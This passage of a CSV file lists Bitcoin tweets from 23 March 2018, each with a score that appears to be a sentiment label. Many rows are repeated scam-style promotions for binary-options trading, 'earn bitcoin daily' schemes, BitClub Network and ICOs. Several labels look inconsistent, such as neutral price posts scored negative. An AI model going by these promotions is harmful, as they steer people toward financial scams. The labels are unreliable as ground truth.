U should consider some bitcoin private .,0.0 +Fri Mar 23 07:43:35 +0000 2018,"@trmakgatho if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:44:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:44:13 +0000 2018,"Bye bye bull. +Buy position in another few hundred #bitcoin",-1.0 +Fri Mar 23 07:44:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:45:19 +0000 2018,#Bitcoin slumps after Japan's FSA warns #Binance for operating without a license. -4.5% so far.,1.0 +Fri Mar 23 07:45:26 +0000 2018,haha diet bitcoin what in the fuck,-1.0 +Fri Mar 23 07:45:34 +0000 2018,"bitcoin donation adress is: + +1NVNeGryRdNycGEqDv8KqFwUHNpadScU3q + +We do not have to eat + +#donation",0.0 +Fri Mar 23 07:45:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:45:57 +0000 2018,I just giggle like a kid when I️ check my bitcoin account 🤑🤑🤑,0.0 +Fri Mar 23 07:46:05 +0000 2018,"@RepRatcliffe What about Devos, Price, Mercer and even Theil who supports Russia with BITCOIN!",0.0 +Fri Mar 23 07:46:05 +0000 2018,"@RepRatcliffe What about Devos, Price, Mercer and even Theil who supports Russia with BITCOIN!",0.0 +Fri Mar 23 07:46:14 +0000 2018,@XRPTrump @TwitterSupport Sadly Tweetters CEO is only supporting bitcoin. The xrp community no longer have a voice in this,-1.0 +Fri Mar 23 07:46:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:46:33 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:46:35 +0000 2018,"@bitcoingold we trust bitcoin gold more than bch , +in future price be higher its civil coin ! 
+but bch is monopoly bitmain monster.",1.0 +Fri Mar 23 07:46:38 +0000 2018,MEH WANT BITCOIN!!,0.0 +Fri Mar 23 07:47:02 +0000 2018,"@ChrisMaroleng if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:47:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:47:27 +0000 2018,"Bitcoin eliminates the need for banks, gets rid of credit card fees, currency exchange fees and money transfer fees #bitcoin #bitcoinminer",0.0 +Fri Mar 23 07:47:41 +0000 2018,"Lols,this generation won't kill me! Which one is ""o sha prapra olosho to n gba bitcoin""? 😁😁😁",0.0 +Fri Mar 23 07:47:51 +0000 2018,"@Simply_Msizi if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:48:23 +0000 2018,Bitcoin's movies discussion makes it a front-runner to these corporations,0.0 +Fri Mar 23 07:48:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:48:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:48:46 +0000 2018,@reaposhi wht was interesting to me is that ceo of bitcoin dot com was actively saying that they were supporting bitcoin cash.,1.0 +Fri Mar 23 07:49:16 +0000 2018,More and more #hosting companies start accepting #bitcoin and other #cryptocurrencies. 
Just an observation.,1.0 +Fri Mar 23 07:49:27 +0000 2018,@Cointelegraph Bitcoin bubble crashing really hard,-1.0 +Fri Mar 23 07:50:04 +0000 2018,"1 bitcoin = $8435.77 / 6839.14€ +1 bitcoin-cash = $972.047 / 788.068€ +1 ethereum = $515.26 / 417.737€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:50:20 +0000 2018,"@mbali_ndlela if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:50:46 +0000 2018,Wake the F*CK up people! If you don't own #crypto by mid-2018 then you are going to miss out 'THE CHANCE' of your life. #Bitcoin,1.0 +Fri Mar 23 07:51:10 +0000 2018,"Calm before the storm... + +#bitcoin #crypto",1.0 +Fri Mar 23 07:51:31 +0000 2018,Bitcoin value: $8419.63,0.0 +Fri Mar 23 07:51:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:52:10 +0000 2018,@PhilakoneCrypto Bitcoin might be illegal as they found child porn links embed in the blockchain. Maybe reason why we have panic sellout,-1.0 +Fri Mar 23 07:53:34 +0000 2018,@yishi888 Wish I could buy more OCN but my money is stuck in SAY 😩😩😩 praying Kucoin gives us bitcoin for the SAY so I can buy more OCN!!!,1.0 +Fri Mar 23 07:53:46 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:53:56 +0000 2018,@rogerkver @Falkvinge But in saying that I think Bitcoin Cash touches most ppl in a bad place...,-1.0 +Fri Mar 23 07:53:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:54:07 +0000 2018,@sabotagebeats Yeah. But bitcoin dot com has nothing to do with bitcoin. It’s a propaganda site for bcash runned by the btrash scam team.,-1.0 +Fri Mar 23 07:54:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:55:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:55:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:55:39 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:56:00 +0000 2018,what the online social media website named Twitter™ about bitcoin can i just buy some ethereum on coinbase,1.0 +Fri Mar 23 07:56:22 +0000 2018,PEOPLE LOOK INTO A CRYPTOCURRENCY CALLED WANCHAIN ( WAN) ALL IM SAYING IT WILL BE BIGGER THAN BITCOIN !! check it out do your own dd,1.0 +Fri Mar 23 07:56:30 +0000 2018,"@caldwellsiegel1 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:56:57 +0000 2018,@whatbitcoindid Don't transfer more Bitcoin than you are willing to lose to your bitmex account.,1.0 +Fri Mar 23 07:56:58 +0000 2018,"@Joseph66352787 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:57:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:57:31 +0000 2018,"@thelastdon430 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:57:47 +0000 2018,@oggasbagss If you can find a bitcoin ATM you can get the wired transfer,0.0 +Fri Mar 23 07:57:58 +0000 2018,"@Bwreckless if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:58:10 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:58:23 +0000 2018,"@A1hurns if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:58:33 +0000 2018,Instant liquidity through the API from the relevant #Minerva trading exchanges. #ICO #Ethereum #Blockchain #Bitcoin #Crypto,1.0 +Fri Mar 23 07:58:39 +0000 2018,"Backed by neither a government nor a bank, bitcoin has attracted currency speculators in recent months.",0.0 +Fri Mar 23 07:58:55 +0000 2018,"@footballman58 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:59:02 +0000 2018,"This Easter i will be helping my Maglera people get involved in bitcoin mining #oneONone +😎 😎 😎",0.0 +Fri Mar 23 07:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27838.31 | LITECOIN(MCDTBC) R$573.33000000,0.0 +Fri Mar 23 07:59:09 +0000 2018,@Join_Civil Fed up with all this Blockchain/Bitcoin hucksterism. Used to watch Max Keizer but bitcoin drove me away. Don’t trust any of it.,0.0 +Fri Mar 23 07:59:49 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,431.17, market cap of $142,778,491,482 (44.43%), and 24 hr vol. of $5,557,890,000 (37.79%)",0.0 +Fri Mar 23 08:00:00 +0000 2018,"This just in: Bitcoin is rising! 
+Current Rate: 8395.54 USD = 1 BTC",0.0 +Fri Mar 23 08:00:01 +0000 2018,"Mar 23, 2018 01:00AM #Bitcoin Price: +USD 8620.63 | EUR 7001.33 | JPY 911884.88",0.0 +Fri Mar 23 08:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,443.60 +Change in 1h: +0.18% +Market cap: $142,988,988,560.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 08:00:01 +0000 2018,Current BTC Dominance: 44.49% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 08:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,395.54, EUR 6,813.57",-1.0 +Fri Mar 23 08:00:03 +0000 2018,"1 bitcoin = $8443.6 / 6845.488€ +1 bitcoin-cash = $970.001 / 786.409€ +1 ethereum = $514.614 / 417.213€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:00:02 +0000 2018,"Bitcoin:$8443.6 +Ethereum:$515.299 +Bitcoin Cash:$971.412 +Litecoin:$158.261 +Ripple:$0.630542 +IOTA:$1.25788",0.0 +Fri Mar 23 08:00:03 +0000 2018,"1 bitcoin = $8443.6 / 6845.488€ +1 bitcoin-cash = $970.001 / 786.409€ +1 ethereum = $514.614 / 417.213€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:00:12 +0000 2018,Top 6 BTC/USD Exchange Orderbooks: Resistance til $8600:$23.0M; Support til $8100:$52.1M $BTC $BTCUSD #bitcoin #orderbook #finance #crypto,1.0 +Fri Mar 23 08:00:13 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8399.68/$8409.04 #Bitstamp +$8395.20/$8398.92 #Kraken +⇢$-13.84/$-0.76 +$8353.02/$8442.01 #Coinbase +⇢$-56.02/$42.33",0.0 +Fri Mar 23 08:00:14 +0000 2018,$ETH / $BTC marketcap ratio = 35.5% #bitcoin #cryptocurrency,0.0 +Fri Mar 23 08:00:17 +0000 2018,2018-03-23 08:00 UTC Bitcoin Price: 8395.52 USD,0.0 +Fri Mar 23 08:00:23 +0000 2018,"@SimonBotes @brett_stclair Doubt it’ll happen - why reinvent the wheel when we already have Bitcoin, Monero, etc?",0.0 +Fri Mar 23 08:00:26 +0000 2018,#XEM Price is 0.00003276 (-0.00000010) #BTC / 0.275143 (-0.00148) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 08:00:28 +0000 2018,#SUB Price is 0.00004518 (+0.00000028) #BTC / 0.379461 (+0.00149) #USD. Market rank is 117. 
#substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 08:00:29 +0000 2018,#EOS Price is 0.00076389 (-0.00001458) #BTC / 6.41541 (-0.10976) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 08:00:29 +0000 2018,#ADA Price is 0.00002235 (-0.00000028) #BTC / 0.187662 (-0.00203) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 08:00:30 +0000 2018,"BTC hourly update +$8403.88 | +0.0011%📈 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 08:00:30 +0000 2018,#DASH Price is 0.0474086 (-0.00009870) #BTC / 398.154 (-0.05400) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 08:00:43 +0000 2018,#Bitcoin Price 8395.00 USD via Chain,0.0 +Fri Mar 23 08:00:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:00:48 +0000 2018,Current price of Bitcoin is $8395.00.,0.0 +Fri Mar 23 08:00:49 +0000 2018,Current price of Bitcoin is $8395.00 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 08:00:52 +0000 2018,"#Bitcoin $8,403.49 v #BitcoinCash $969.54 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 17:00JST",0.0 +Fri Mar 23 08:00:55 +0000 2018,They said the internet would make the world a better place. They was right. $crypto $BTC #bitcoin,1.0 +Fri Mar 23 08:01:04 +0000 2018,@WhalePanda Selling Bitcoin for BCash is actually very brave. (for different reasons),1.0 +Fri Mar 23 08:01:21 +0000 2018,Current price of Bitcoin is 8395.00 USD,0.0 +Fri Mar 23 08:01:26 +0000 2018,So.... 
Bitcoin Crash is Twerking Complete!!!,1.0 +Fri Mar 23 08:01:27 +0000 2018,Current price of Bitcoin is $8395.00,0.0 +Fri Mar 23 08:01:34 +0000 2018,"Market Update: +Bitcoin - $8,443.60 +Bitcoin Cash - $971.41 +Ethereum - $515.30 +Litecoin - $158.26 +Ripple - $0.63 +#Cryptos",0.0 +Fri Mar 23 08:01:42 +0000 2018,Bitcoin 8395.00 $,0.0 +Fri Mar 23 08:01:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:02:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:02:11 +0000 2018,Current price of #Bitcoin is $8395.00,0.0 +Fri Mar 23 08:02:13 +0000 2018,"As of March 23, 2018 at 09:00AM, Bitcoin is valued at $8395.00. #cryptocurrencies #cryptofinance24 $BTC #Bitcoin",0.0 +Fri Mar 23 08:02:21 +0000 2018,The current price of Bitcoin is $8395.00 $BTC How's your wallet?,0.0 +Fri Mar 23 08:02:24 +0000 2018,"@LeNuitRenard @Crypto_Wax @LordRapt0rJesus @ProfFaustus Out of interest, what do you use bitcoin cash to buy?",0.0 +Fri Mar 23 08:02:43 +0000 2018,"Bitcoin percentage of market cap: 44.45 % +#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance",0.0 +Fri Mar 23 08:03:05 +0000 2018,Current price of Bitcoin is $8395.00 via Chain,0.0 +Fri Mar 23 08:03:12 +0000 2018,Current price of #Bitcoin is $8395.00 via Chain #BTCUSD #cryptocurrencies #blockchain,0.0 +Fri Mar 23 08:03:12 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!!!!",1.0 +Fri Mar 23 08:03:42 +0000 2018,"BITCOIN is stuck at 8,400 USD and cannot move from there. Get ready for another PRICE DROP. We would expect to see it around 5,000 USD soon.",1.0 +Fri Mar 23 08:04:15 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:04:33 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:04:34 +0000 2018,@rogerkver Bitcoin cash? Bahahaha... it’s bcash fool.,0.0 +Fri Mar 23 08:06:15 +0000 2018,Bitcoin please,0.0 +Fri Mar 23 08:06:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:06:57 +0000 2018,"@Cylinders_io Wonderful project! +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 08:06:58 +0000 2018,@rogerkver Just in case you missed it roger. Everyone hates bcash. You lost. Bitcoin won!⚡️🏆,0.0 +Fri Mar 23 08:08:31 +0000 2018,$BTCUSD exiting oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 08:09:06 +0000 2018,BTC $8443.60 Up +$28.21 +0.33% in the last hour #bitcoin #bitsmart,0.0 +Fri Mar 23 08:09:10 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:09:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:09:30 +0000 2018,Does anyone know how to buy bitcoin that could help me,0.0 +Fri Mar 23 08:10:02 +0000 2018,"Get your ROCKET Coin Now!The Coin of ICO Advisers +#theicorocket #ICO #bitcoin #blockchain +#theicorocket #rocket #ico #presale #investment",0.0 +Fri Mar 23 08:10:03 +0000 2018,"1 bitcoin = $8443.71 / 6845.577€ +1 bitcoin-cash = $972.342 / 788.307€ +1 ethereum = $517.157 / 419.275€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.435,220 +1 Hour: 0.02 % | 24 Hours: -6.39 % | 7 Days: 2.70 % +#btc #bitcoin",0.0 +Fri Mar 23 08:10:30 +0000 2018,SIdeways movements. I have no large position. I just hope Bitcoin does not crash.,-1.0 +Fri Mar 23 08:10:55 +0000 2018,@officialmcafee @theemrsmcafee How do you walk with those balls of steel? 
#Bitcoin #Litecoin #Ethereum #Monero #NEO #HODL,0.0 +Fri Mar 23 08:10:57 +0000 2018,"@2B7C89526 So if we all stop eating and using bitcoin, we will end heart disease and obesity as well as money laundering and crime.",0.0 +Fri Mar 23 08:11:06 +0000 2018,@siosism @rogerkver bitcoin private is real bitcoin cash,1.0 +Fri Mar 23 08:11:32 +0000 2018,Bitcoin value: $8456.11,0.0 +Fri Mar 23 08:11:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:11:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:12:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:12:37 +0000 2018,"@klr_reno if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:13:16 +0000 2018,@CryptoJuan36 @jonny5crypto To get more bitcoin,1.0 +Fri Mar 23 08:13:35 +0000 2018,Bitcoin is joss,0.0 +Fri Mar 23 08:13:41 +0000 2018,"@castillo19460 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:14:24 +0000 2018,"Bitcoin price resistance points +$9280 -> $11300 -> $12900 -> $14500 -> $16900 -> $19800",0.0 +Fri Mar 23 08:14:25 +0000 2018,Retweet if you agree. Bitcoin is cyber snob currency . #bitcoin #bitcointrading,0.0 +Fri Mar 23 08:14:56 +0000 2018,"Current Bitcoin Price = $9509.67 --- Includes Sum of Forks, Core $8478.00 (89.15%) + Cash $974.68 (10.25%) + Gold $56.99 (0.60%)",0.0 +Fri Mar 23 08:15:01 +0000 2018,"@CatsofVelvet if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:15:02 +0000 2018,"The current price of Bitcoin is $8443.71. 
+The current price of BCash is $972.342, or 0.115549 BTC",0.0 +Fri Mar 23 08:15:37 +0000 2018,"@Bryana42535010 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:16:01 +0000 2018,ICX is now £2.68. #crypto #cryptocurrency #bitcoin #altcoins,0.0 +Fri Mar 23 08:16:16 +0000 2018,"@DeplorableLilly if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:16:27 +0000 2018,"Do not miss the opportunity to invest in a project, as I do. +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",0.0 +Fri Mar 23 08:16:30 +0000 2018,"(📫) - Does Mario like Bitcoin. +Pages: 1, 2, ... 691, 692",0.0 +Fri Mar 23 08:16:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:16:40 +0000 2018,"@66fiveandahalf if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:16:52 +0000 2018,@k_keren @wmd4x buy bitcoin and hodl they say...,0.0 +Fri Mar 23 08:17:03 +0000 2018,"Bitcoin Cash BCH Current Price: +$971,616 +1 Hour: 0.06 % | 24 Hours: -7.25 % | 7 Days: 5.27 % +#bch #bitcoin cash",0.0 +Fri Mar 23 08:17:26 +0000 2018,"@rogerkver @Falkvinge I’m not a super big Bitcoin Cash fan, but seeing all these hateful responses actually makes me want to buy more of it.",1.0 +Fri Mar 23 08:17:31 +0000 2018,"@alexiou88888888 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:17:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:18:00 +0000 2018,Two Hour Lull Update: CryptoCompare Bitcoin price: $8488.51 #bitcoin,0.0 +Fri Mar 23 08:18:01 +0000 2018,"@Ingrid1Ser if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:18:18 +0000 2018,The Guardian economist has the right to analyze one bitcoin exchange often,1.0 +Fri Mar 23 08:18:20 +0000 2018,"@caylynmira if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:18:20 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:18:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:18:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:18:56 +0000 2018,"@curlymichelle48 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:18:56 +0000 2018,"The future is here, do not miss the new opportunities, join us! +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 08:19:15 +0000 2018,"@McKenna25908429 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:19:29 +0000 2018,"Merry smiled. ''Well then,'' he said, ''There is now 1.000.000 of US debt for every #bitcoin that will ever be mined.''",1.0 +Fri Mar 23 08:19:37 +0000 2018,@monsterbitar @Bitcoin What if aliens invade us?👽 I think this is more likely!,1.0 +Fri Mar 23 08:19:44 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:19:45 +0000 2018,"@TatianaGlobal if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:20:04 +0000 2018,"1 bitcoin = $8476.72 / 6872.339€ +1 bitcoin-cash = $981.85 / 796.016€ +1 ethereum = $522.52 / 423.623€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:20:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:20:13 +0000 2018,"@WhalePanda BCH : Bitcoin Douche +I feel sorry for the guys owning BCH bags",-1.0 +Fri Mar 23 08:20:38 +0000 2018,"Very strong team of specialists in this field, I recommend! +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 08:20:38 +0000 2018,I GOT 1 BITCOIN,0.0 +Fri Mar 23 08:21:06 +0000 2018,"@DragoranHS Oslo, only 15 minutes in and it’s more monkaS than watching bitcoin tank.",1.0 +Fri Mar 23 08:21:49 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:22:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:23:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:23:21 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:24:33 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:24:43 +0000 2018,Pro Tip: Consider looking at inverted charts from time to time to eliminate bias in your trading. 
$BTC #Bitcoin,0.0 +Fri Mar 23 08:25:05 +0000 2018,"@ebmccormack if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 08:25:14 +0000 2018,"@hashflare @aBitGreedy_ It's legit. However, if the price of bitcoin is under 8000, there is no hope for a return on investment.",0.0 +Fri Mar 23 08:25:19 +0000 2018,@buzzyNZ Ahhh yes someone invests $1K in bitcoin and all of a sudden they are a cryptocurrency guru..,0.0 +Fri Mar 23 08:25:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:26:01 +0000 2018,"#BinaryFest #BinaryOptions #Forex #Bitcoin #MakeMoney, 3 Places to Park For $5 Or Less at a Detroit Tiger's Game at Comerica Park...",-1.0 +Fri Mar 23 08:26:04 +0000 2018,Bitcoin feels like a virtual Las Vegas!,0.0 +Fri Mar 23 08:26:21 +0000 2018,"฿ value over 1 year: +765.92%, (+$7449.41) [Currently $8422.015] #bitcoin",0.0 +Fri Mar 23 08:26:25 +0000 2018,You can't stop things like Bitcoin. It will be everywhere and the world will have to readjust #quotes #bitcoinquotes #bitcoin #btc,0.0 +Fri Mar 23 08:26:31 +0000 2018,@cryptomanran Bitcoin futures....Since they introduced those the market got screwed by manipulation.,0.0 +Fri Mar 23 08:26:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:27:47 +0000 2018,"Mark position for: 1 Bitcoin = $ 100,009.69 USD This has to happen!",0.0 +Fri Mar 23 08:28:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:28:05 +0000 2018,@nycjim Stock crack guys. 
Buy bitcoin now,0.0 +Fri Mar 23 08:28:27 +0000 2018,@zebpay TCC {The Champ coin } Top crypto currency in india after 2-3 year The next bitcoin,1.0 +Fri Mar 23 08:29:15 +0000 2018,"@purplerypple @DiaryofaMadeMan Here's a safer bet, BUY BITCOIN!",0.0 +Fri Mar 23 08:29:19 +0000 2018,Current price of Bitcoin is $8395.00 #Bitcoin #Bithound,0.0 +Fri Mar 23 08:29:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:30:02 +0000 2018,"Bitcoin:$8524.83 +Ethereum:$524.005 +Bitcoin Cash:$985.372 +Litecoin:$159.946 +Ripple:$0.637726 +IOTA:$1.28154",0.0 +Fri Mar 23 08:30:04 +0000 2018,"1 bitcoin = $8524.83 / 6911.343€ +1 bitcoin-cash = $985.372 / 798.871€ +1 ethereum = $524.005 / 424.827€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 08:30:04 +0000 2018,"Bitcoin is a set of rules, not just a form of money. Currency is only the first application.",1.0 +Fri Mar 23 08:30:04 +0000 2018,One Bitcoin now worth $8484.21@bitstamp. High $9025.000. Low $8342.000. Market Cap $143.673 Billion #bitcoin,1.0 +Fri Mar 23 08:30:26 +0000 2018,#DASH Price is 0.0473969 (-0.00001170) #BTC / 402.1 (+3.94600) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 08:30:28 +0000 2018,#ADA Price is 0.00002264 (+0.00000029) #BTC / 0.19208 (+0.00442) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 08:30:30 +0000 2018,#XEM Price is 0.00003308 (+0.00000032) #BTC / 0.280236 (+0.00509) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 08:30:30 +0000 2018,#SUB Price is 0.00004504 (-0.00000014) #BTC / 0.381613 (+0.00215) #USD. Market rank is 118. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 08:30:31 +0000 2018,#EOS Price is 0.00078584 (+0.00002195) #BTC / 6.66679 (+0.25138) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 08:31:02 +0000 